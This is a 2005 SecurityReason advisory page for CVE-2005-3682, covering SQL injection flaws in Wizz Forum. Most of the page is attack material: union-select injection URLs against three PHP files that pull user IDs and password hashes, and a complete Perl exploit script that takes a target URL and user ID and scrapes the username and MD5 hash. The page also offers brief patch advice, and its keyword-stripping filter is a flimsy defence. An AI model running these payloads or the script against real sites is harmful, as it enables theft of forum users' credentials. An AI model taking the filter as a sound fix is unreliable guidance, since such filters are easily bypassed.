|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 181 CVE : CVE-2005-3682 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : HACKERS PAL Published : 15.11.2005
Advisory Content : Hello,, Multible Sql injections in Wizz Forum ,, Discovered by : HACKERS PAL Thanks For :: DeviL-00 - Abducter(Abducter_Minds) - almaster -=-=-=-=-=-=-=-=-=-=-=-=-=-=- file : ForumAuthDetails.php ForumAuthDetails.php?AuthID=-4654'%20union%20select%20password,userid,passw ord,userid,5,6,7,"http://www.sqor.net",lastlogin,lastlogin,lastlogin,546546 5464,8979878745%20from%20ForumUser%20where%20user_index=1 -=-=-=-=-=-=-=-=-=-=-=-=-=-=- file : ForumTopicDetails.php ForumTopicDetails.php?TopicID=-10%20union%20select%201,userid,password,user id,joindate,4444444,4444444%20from%20ForumUser%20where%20user_index=1 -=-=-=-=-=-=-=-=-=-=-=-=-=-=- file : ForumReply.php username ForumReply.php?TopicID=-10%20union%20select%201,userid,3,4,5,6,7%20from%20F orumUser%20where%20user_index=1 password ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%2 0ForumUser%20where%20user_index=1 -=-=-=-=-=-=-=-=-=-=-=-=-=-=- How To Protect .. open ForumTopicDetails.php on line 28 After [ if (mysql_select_db ($MySQLDatabasename)) { ] add : $TopicID=intval($_GET['TopicID']); open ForumReply.php on line 46 After [ if (mysql_select_db ($MySQLDatabasename)) { ] add : $TopicID=intval($_GET['TopicID']); open ForumAuthDetails.php on line 28 : after [ if (mysql_select_db ($MySQLDatabasename)) { ] add :- $AuthID=addslashes(htmlspecialchars($_GET['AuthID'])); $AuthID=str_replace(",","",$AuthID); $AuthID=str_replace("'","",$AuthID); $AuthID=str_replace('"',"",$AuthID); $AuthID=str_replace("password","",$AuthID); $AuthID=str_replace("user","",$AuthID); $AuthID=str_replace("id","",$AuthID); exploit :- #!/bin/env perl #//-----------------------------------------------------------# #// Wizz Forum SQL Injection Exploit .. By HACKERS PAL #// Greets For Devil-00 - Abducter - Almaster #// http://WwW.SoQoR.NeT #//-----------------------------------------------------------# use LWP::Simple; print "\n#####################################################"; print "\n# Wizz Forum Exploit By : HACKERS PAL #"; print "\n# Http://WwW.SoQoR.NeT #"; if(!$ARGV[0] or !$ARGV[1]) { print "\n# -- Usage: #"; print "\n# -- perl $0 [Full-Path] [User ID] #"; print "\n# -- Example: #"; print "\n# -- perl $0 http://vubb.com/forum/1 #"; print "\n# Greets To Devil-00 - Abducter - almastar #"; print "\n#####################################################"; exit(0); } else { print "\n# Greets To Devil-00 - Abducter - almastar #"; print "\n#####################################################"; $web=$ARGV[0]; $id=$ARGV[1]; $url = "ForumTopicDetails.php?TopicID=-10%20union%20select%20userid,password,passw ord,userid,joindate,4444444,4444444%20from%20ForumUser%20where%20user_index =$id"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; print "\n[+] Connected to: $ARGV[0]\n"; print "[+] User ID is : $id "; $page =~ m/<td width='100%' colspan='3'><font face='Arial' size='2'>(.*?)<\/font><\/td>/ && print "\n[+] User Name is: $1\n"; print "\n[-] Unable to retrieve User Name\n" if(!$1); $page =~ m/<font face='Arial' size='4'>Topic: (.*?)<\/font>/ && print "[+] MD5 hash of password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1); } # Finished  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |